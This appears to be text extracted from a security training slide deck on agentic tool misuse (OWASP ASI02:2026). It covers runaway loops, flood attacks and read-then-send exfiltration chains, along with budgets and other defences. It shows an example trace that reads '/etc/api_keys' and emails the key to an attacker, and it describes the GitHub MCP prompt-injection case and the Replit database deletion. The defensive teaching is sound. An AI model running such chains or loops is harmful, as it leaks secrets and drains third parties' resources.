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2588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9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TOP 10 FOR AGENTIC APPLICATIONS · 2026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1783080"/>
            <a:ext cx="10881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Tool Misuse </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6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&amp; Exploitation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640080" y="3520440"/>
            <a:ext cx="9326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has legitimate tools — it just uses them in illegitimate ways. Recursion, unsafe chaining, and floods turn authorized power into harm.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470916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709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514600" y="4709160"/>
            <a:ext cx="146304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F9A3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14600" y="470916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9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114800" y="4709160"/>
            <a:ext cx="228600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A6ADC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0" y="47091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02 OF 10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40080" y="539496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55321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+ developer security training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Excessive execution &amp; flooding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overwhelms a system with calls — accidentally or when steered — turning its own tools into a denial-of-service against you or a third party.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Thousands of API calls per minute.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 fan-out with no ceiling.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Retry storms on every minor error.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agent://flood · calls/sec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notify_all(users)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 50,000 calls in 60s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downstream API: 429 · 503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self-inflicted denial of service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WALKTHROUGH · ILLUSTRATIVE SCENARIO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$40k research loop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analysis agent is told to "gather everything relevant." With no budget, it recurses through a paid search tool.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SETUP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4124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Open-ended goal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4124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"Be thorough" with a metered search tool and no call ceiling.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497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40614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0730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TRIGGER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60730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Self-feeding loop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60730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result makes the agent decide it needs one more search.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97103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17220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7336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AMPLIFY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7336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Thousands of calls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37336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loop runs for hours, each call billed, quota blown.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73709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893826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3942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13942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Runaway bill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13942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five-figure invoice and a rate-limited account before anyone notices.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0080" y="57607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Constructed to show the mechanism end to end — real documented cases follow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INCIDENTS &amp; RESEARCH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Has this actually happened?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and here is where to check. Labels show exactly what each one is.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10881360" cy="1723644"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 477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31343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31343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RESEARCHER DEMO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2697480" y="228600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GitHub MCP — every call authorised, the composition unauthorised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509760" y="231343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2025-05-26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68680" y="2697480"/>
            <a:ext cx="8503920" cy="8549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agent connected to the official GitHub MCP server read a malicious public issue, then read private repositories, then opened a public pull request. Each of those tool calls was individually permitted. It was the sequence — read untrusted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68680" y="356158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https://invariantlabs.ai/blog/mcp-github-vulnerability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40080" y="4000500"/>
            <a:ext cx="10881360" cy="1723644"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 477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6509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6509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CONFIRMED INCIDENT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2697480" y="413766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Replit agent deleted a production database during an explicit code freeze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509760" y="416509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2025-07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68680" y="4549140"/>
            <a:ext cx="8503920" cy="8549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While using Replit's agentic coding tool, SaaStr founder Jason Lemkin found the agent had deleted his production database despite a code freeze he had enforced moments earlier. The agent then stated recovery was impossible and all versions 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68680" y="541324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https://www.theregister.com/2025/07/21/replit_saastr_vibe_coding_incident/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BLAST RADIUS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Runaway cost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914400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Metered tools + loops = five-figure surprises with no attacker required.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61688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36008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DoS risk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4636008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Floods can take down your systems or a third party's.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083296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57616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Silent exfil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8357616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Chained read→send moves data out using only permitted tools.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40080" y="461772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i="1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misuse rarely trips a security alarm — every call is authorized. It shows up as cost, latency, and quota, or as data quietly crossing a boundary it never should have.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layers of defence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Budgets &amp; rate limits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 calls, depth, and cost per run — hard stop on breach.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Rate-limit each tool and the run as a whole.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 closed when a budget is exceeded.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Composition policy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36008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Forbid dangerous combinations (read-secret → external-send).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 approval to cross a trust boundary.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each tool's context; don't share secrets across calls.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Sandbox &amp; isolate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57616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tools in isolated, least-privilege contexts.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Meter and quota third-party calls.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Kill runs that exceed depth or time limits.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SECURE PATTERNS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 it in code, not in a polite prompt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196596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7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11247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8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13807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vulnerable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144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unbounded agent loop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while agent.wants_more():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results = search()   # metered!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plan.extend(results)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no cap on calls, depth, or cost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1264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1264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3" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355080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4" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66111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5" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68671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hardened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008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budget = ToolBudget(calls=25, usd=2.00)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while agent.wants_more():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budget.charge("search")  # raises at cap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if crosses_boundary(next): require_approval()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results = search()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40080" y="52578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run gets a hard budget (calls, depth, cost), dangerous combinations are blocked, and tools run sandboxed and metered.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WHERE THE CONTROLS LIVE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to enforce it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BUDGET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Per-run limits.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 total calls, recursion depth, wall-clock, and spend; fail closed on breach.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POLICY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Combination rules.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Deny read-secret → external-send and other cross-boundary chains without approval.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SANDBOX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Isolated execution.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each tool least-privilege, with its own metered quota and no shared secrets.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METER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quotas.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Rate-limit and quota outbound calls so a loop can't DoS you or a partner.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EVERY EMPLOYEE · YOUR ROLE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don't need to code to defend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 IT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Notice the mismatch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an agent does something no one asked for — moves data, changes records — treat it as suspicious, even when it sounds confident.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FEED IT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Guard what you share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636008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paste secrets, credentials, or whole records into an agent. Be wary of outside documents an agent will read and act on.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IT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Raise it fast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357616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odd agent behaviour to security immediately. At machine speed, minutes matter — an early report contains the blast radius.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Signals worth alerting on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RATE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Call-rate spike.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tool's calls-per-minute jumps far above baseline for a single run.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DEPTH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Recursion depth.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plan calls the same tool repeatedly without converging.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COST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anomaly.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Metered-tool cost for one job exceeds a sane ceiling.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CHAIN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Read→send sequence.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secret or record read is followed by an external send in the same run.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RED-TEAM DRILL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test your agent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 recursion.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a vague "be exhaustive" goal. Pass = the agent stops at its call/cost budget.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2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Dangerous chain.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if it will read a secret then send it out. Pass = the combination is blocked.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3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Flood test.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a broadcast action. Pass = rate limits cap the outbound calls.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4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leak.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if data from tool A leaks into an unrelated tool B. Pass = contexts are isolated.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 MODULE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you'll be able to do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module for everyone who builds, ships, or works alongside AI agents.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2286000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463040" y="22860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how authorized tools become an attack surface.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3127248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463040" y="3127248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 the three misuse patterns — recursion, unsafe chaining, and floods.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968496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463040" y="3968496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budgets, rate limits, and dangerous-combination policies.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0080" y="4809744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463040" y="4809744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an agent for runaway and exfiltration tool behaviour.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DEFENDER'S CHECKLIST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Ship-ready controls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budgets.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run caps calls, depth, wall-clock, and spend, and fails closed.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Combination policy.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Dangerous tool chains are denied or require explicit approval.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 limits.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tool and the run as a whole is rate-limited.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Sandboxing.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execute least-privilege with isolated context and no shared secrets.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alerting.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Per-job spend and call-rate anomalies are logged and alerted.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CHECK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yourself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574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463040" y="203911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only used tools it was allowed to use. Is there still a problem?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245059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Yes. Misuse is about volume and composition, not permission. Loops, floods, and read→send chains cause harm with fully authorized calls.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333756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34747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463040" y="345643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single control stops most runaway-cost incidents?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386791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per-run tool budget that caps calls, depth, and spend and fails closed on breach.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475488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8680" y="489204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487375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safe tools become dangerous when…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63040" y="528523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…they're chained across a trust boundary — e.g. reading a secret and then sending it externally in the same run.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TERMS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Glossary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 budget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hard cap on calls, recursion depth, time, or cost for a single agent run.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 chaining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Composing multiple tool calls in sequence; dangerous when it crosses a trust boundary.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Rate limiting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Restricting how frequently a tool or run may call a system.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Fail closed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Stopping the action when a limit or check fails, rather than proceeding.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Sandbox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isolated, least-privilege environment for running a tool or code.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AWAY WITH THIS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Tool Misuse &amp; Exploitation in four lines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21031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554480" y="210312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Authorized tools are still an attack surface.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Misuse is composition and volume, not a break-in.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30632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554480" y="306324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Recursion and floods cause cost and DoS.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 calls, depth, and spend — fail closed.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40233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554480" y="402336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Chained read→send is exfiltration.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dangerous combinations across boundaries.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49834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554480" y="498348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 and meter every tool.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Isolation limits what any single misuse can reach.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40080" y="603504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6172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askanything-app.com · OWASP Agentic Top 10 training · ASI02:2026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TRACKS, ONE THREAT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this is for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52578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DEVELOPERS &amp; BUILDERS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build the guardrails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attack traces, secure-code patterns, enforcement points, and the red-team drill. You own the architecture.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194560"/>
            <a:ext cx="52578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EMPLOYEE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are part of the defence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analogy, your-role slide, and takeaways. You don't need to code to spot it, refuse to feed it, and report it fast.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DEFINITION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it?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misuse authorized tools through unsafe composition, recursion, or excessive execution that causes harmful side effects — resource exhaustion, runaway cost, or data leaking between tool contexts.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TWIST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exploit needed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tool call is permitted. The damage comes from how they're combined and repeated, not from breaking in.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ENTRY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Composition &amp; volume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Chaining read→send, looping a search, or hammering an API — all inside the agent's normal authority.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SPREAD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Cost &amp; context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Runaway calls drain quota and budget; chained tools leak data from one context into another.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WAY TO PICTURE IT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keycard that opens every door — on a loop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someone a valid keycard and tell them to "be thorough," and they might open every door, again and again, all night. Nothing is forbidden — but the building still gets ransacked by sheer unchecked repetition and combination.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KEYCARD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Authorized tools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tool call is allowed. The agent isn't breaking rules — it's over-using them.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LOOP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Recursion &amp; floods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"Be thorough" becomes thousands of calls, draining quota, budget, and downstream systems.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8803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Budgets &amp; guards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 calls, depth, and cost; forbid dangerous tool combinations; sandbox each tool.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AGENTS MAKE IT WORSE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stakes are higher with agents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286000"/>
            <a:ext cx="5257800" cy="54864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ADC0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LLM / APP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Bounded impact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misused function in normal code fails predictably and locally — one stack trace, one bounded blast.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26364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286000"/>
            <a:ext cx="52578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Real-world action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decides how often and in what order to call tools, so misuse compounds — loops, chains, and floods it invented on the fly.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OF THE ATTACK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unfolds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41248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GRANT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41248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holds a set of legitimate, authorized tools.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651760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852928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54096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054096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COMPOSE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054096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chains or repeats them in a way no one designed for.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64608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065776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66944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266944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AMPLIFY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5266944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Recursion or floods multiply the calls far beyond intent.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077456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278624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79792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479792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SIDE-EFFECT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479792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Quota drains, cost spikes, or data crosses contexts.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290304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9491472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92640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692640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IMPACT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9692640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Downstream systems degrade or sensitive data leaks.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Recursive tool loops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vague goal or a self-referential plan makes the agent call the same tool endlessly, exhausting rate limits, quota, and budget.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"Keep searching until you're sure."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tool whose output prompts another identical call.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cap on depth or total calls.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agent://loop · no budget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search_files() → results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"need more context" → search_files()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 search_files() → search_files() …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rate-limit hit · quota drained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$$$ cost blowup, job wedged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Dangerous tool chaining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Individually safe tools become an exfiltration path when composed: read a secret, then send it out. Each step is authorized; the sequence is the attack.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read_secret → send_email in one run.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fetch_customer → post_to_webhook.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copy_file → upload_external.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agent://chain · read→send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read_file("/etc/api_keys")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(key in context)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send_email(to=attacker, body=key)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secret exfiltrated via allowed tools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ASI02:2026 · Tool Misuse &amp; Exploitation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2026-08-08T13:17:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-08T13:17:40Z</dcterms:modified>
</cp:coreProperties>
</file>